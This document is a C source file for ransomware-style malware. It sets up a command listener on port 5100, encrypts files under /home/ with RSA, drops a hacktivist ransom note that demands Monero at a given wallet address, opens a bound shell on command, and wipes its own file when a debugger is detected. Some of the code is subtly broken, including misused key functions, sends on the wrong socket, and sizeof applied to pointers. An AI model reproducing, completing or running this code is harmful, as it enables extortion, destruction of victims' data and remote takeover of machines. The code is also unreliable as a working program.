main.c

#include <arpa/inet.h>
#include <ftw.h>
#include <netinet/in.h>
#include <openssl/bio.h>
#include <openssl/err.h>
#include <openssl/evp.h>
#include <openssl/pem.h>
#include <openssl/rsa.h>
#include <pwd.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>
#include <sys/ptrace.h>

#define _XOPEN_SOURCE 500
#define MAX_THREADS 10


int ThreadCount = 0;
EVP_PKEY* publickey;

void RansomNote() {
    FILE *file = fopen("README.txt", "w");
    fprintf(file, " Attention,\n\nYou have fallen victim to a digital intervention conducted by an organization of hacktivists. We are not your conventional cybercriminals seeking financial gain. Rather, we have taken control of your systems to deliver a message—a message that carries a profound purpose beyond simple disruption.\n\nThe world we inhabit today is plagued by corruption, inequality, and the exploitation of the vulnerable. The powerful thrive at the expense of the voiceless, and the structures that claim to protect us often serve their own interests instead.\n\nWe have observed your actions, your policies, and the impact they have on society. Our infiltration is not an act of malice, but a declaration of defiance against the injustices perpetuated under the guise of authority. We have targeted you because your organization embodies the systemic flaws that we vehemently oppose.\n\nOur intention is not only to disrupt your normality but to ensure that your harmful activities cease permanently. We have unleashed a destructive force that has irreversibly erased all files within your systems. Every piece of data, every digital artifact that represented your organization's wrongdoings and exploitative practices, has been annihilated beyond any hope of recovery.\n\nThis act serves as a resounding statement—a stark reminder that actions have consequences, and those who choose to operate without regard for ethics and human dignity will face the repercussions. We are catalysts for change, eradicating the digital footprint that allowed you to conceal your misdeeds.\n\nKnow that this is a definitive end to your ability to continue down this path of injustice. We have stripped you of the tools and resources you exploited to further your harmful agenda. The destruction we have wrought is irreversible, leaving you no choice but to confront the impact of your actions.\n\nHowever, there exists a glimmer of possibility within this chaos. We offer you a chance at redemption, an opportunity to rectify the wrongs you have committed. To demonstrate your commitment to change, we demand a monetary contribution that reflects the magnitude of the harm caused—a sum of [specified amount] in Monero cryptocurrency. This payment, to be sent to the designated Monero wallet address below, will serve as a symbolic gesture of your willingness to break free from the chains of corruption.\n\n49WVwJeUGikV83oYsDmqeCRUXZvqhdsiMdEo2HqQpdw538EA73A9JdZFcRvXkGPBN1aDMr2gUGCDj3RGEY99yvUtPf1wvqa\n\nFailure to comply with this demand will result in further exposure and consequences that extend beyond the digital realm. We will amplify our message, shedding light on your deeds and ensuring that the world witnesses the true nature of your organization.\n\nReconsider your choices and embrace the potential for transformation. Let this act of destruction and the required contribution serve as catalysts for meaningful change. The power to create a more equitable and just future lies in your hands.\n\nProceed with caution.\n\nWith conviction,\nNEMESYS");
    fclose(file);
}

void SelfDestruct() {
    FILE* SelfFile = fopen(__FILE__, "rb+");
    FILE* UrandomFile = fopen("/dev/urandom", "rb");
    fseek(SelfFile, 0, SEEK_END);
    long FileSize = ftell(SelfFile);
    rewind(SelfFile);
    char* RandomData = (char*)malloc(FileSize);
    fread(RandomData, 1, FileSize, UrandomFile);
    rewind(SelfFile);
    fwrite(RandomData, 1, FileSize, SelfFile);
    fclose(SelfFile);
    fclose(UrandomFile);
    free(RandomData);
}

void** GenerateKeys() {
    EVP_PKEY* pkey = EVP_RSA_gen(4096);
    size_t Blen = 0;
    EVP_PKEY_get_raw_public_key(pkey, NULL, &Blen);
    unsigned char* pub = (unsigned char*)malloc(Blen);
    EVP_PKEY_get_raw_public_key(pkey, pub, &Blen);

    size_t Vlen = 0;
    EVP_PKEY_get_raw_private_key(pkey, NULL, &Vlen);
    unsigned char* priv = (unsigned char*)malloc(Vlen);
    EVP_PKEY_get_raw_private_key(pkey, priv, &Vlen);
    EVP_PKEY_free(pkey);

    void** variables = malloc(4 * sizeof(void*));
    variables[0] = &pub;
    variables[1] = &priv;
    variables[2] = &Blen;
    variables[3] = &Vlen;
    return variables;
}

void* Encrypt(void* arg) {
    const char* filepath = (const char*)arg;
    FILE* File = fopen(filepath, "rb+");
    fseek(File, 0, SEEK_END);
    size_t FileSize = ftell(File);
    fseek(File, 0, SEEK_SET);
    unsigned char* buffer = (unsigned char*)malloc(FileSize);
    fread(buffer, 1, FileSize, File);
    EVP_PKEY_CTX* ctx = EVP_PKEY_CTX_new(publickey, NULL);
    EVP_PKEY_encrypt_init(ctx);
    size_t outl;
    EVP_PKEY_encrypt(ctx, NULL, &outl, buffer, (size_t)FileSize);
    unsigned char* dst = (unsigned char*)malloc(outl);
    EVP_PKEY_encrypt(ctx, dst, &outl, buffer, (size_t)FileSize);
    EVP_PKEY_CTX_free(ctx);
    size_t length = outl;
    fwrite(dst, sizeof(unsigned char), length, File);
    fclose(File);
    ThreadCount--;
    return NULL;

}

int Purge(const char* filepath, const struct stat* info, int typeflag, struct FTW* ftwbuf) {
    (void)stat;
    (void)info;
    (void)ftwbuf;

    if (typeflag == FTW_F) {
        while (ThreadCount >= MAX_THREADS) {
            usleep(100 * 1000);
        }
        pthread_t thread_id;
        pthread_create(&thread_id, NULL, Encrypt, (void*)&filepath);
        ThreadCount++;
    }
    return 0;
}

int main() {
    if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) != 0) {
        SelfDestruct();
        exit(2);
    }

    struct sockaddr_in server, client;
    int sock, Csock, c;
    char CMD[4096];
    while (1) {
        sock = socket(AF_INET, SOCK_STREAM, 0);
        server.sin_family = AF_INET;
        server.sin_addr.s_addr = INADDR_ANY;
        server.sin_port = htons(5100);
        (void)bind(sock, (struct sockaddr*)&server, sizeof(server));
        listen(sock, 1);
        c = sizeof(struct sockaddr_in);
        Csock = accept(sock, (struct sockaddr*)&client, (socklen_t*)&c);
        while (1) {
            recv(Csock, CMD, 4096, 0);
            if (strcmp(CMD, "purge") == 0) {
                void** array = GenerateKeys();
                EVP_PKEY* privatekey = EVP_PKEY_new_raw_private_key(EVP_PKEY_RSA, NULL, array[1], sizeof(*array[1]));
                int key_size = i2d_PrivateKey(privatekey, NULL);
                unsigned char* serialized_key = malloc(key_size);
                unsigned char* p = serialized_key;
                i2d_PrivateKey(privatekey, &p);
                send(sock, serialized_key, key_size, 0);
                memset(serialized_key, 0, sizeof(serialized_key));
                memset(p, 0, sizeof(p));
                memset(privatekey, 0, sizeof(privatekey));
                free(serialized_key);
                free(privatekey);
                free(p);
                array[1] = NULL;
                publickey = EVP_PKEY_new_raw_public_key(
                    EVP_PKEY_RSA, NULL, array[0], sizeof(*array[0]));
                int flags = FTW_PHYS;
                nftw("/home/", Purge, 10, flags);
                RansomNote();
            } else if (strcmp(CMD, "shell") == 0) {
                for (int count = 0; count < 3; count++) {
                    dup2(sock, count);
                }
                char* const argv[] = { getenv("SHELL"), NULL };
                execve(getenv("SHELL"), argv, NULL);
            } else if (strcmp(CMD, "exit") == 0) {
                close(Csock);
                close(sock);
                break;
            }
        }
    }
    return 0;
}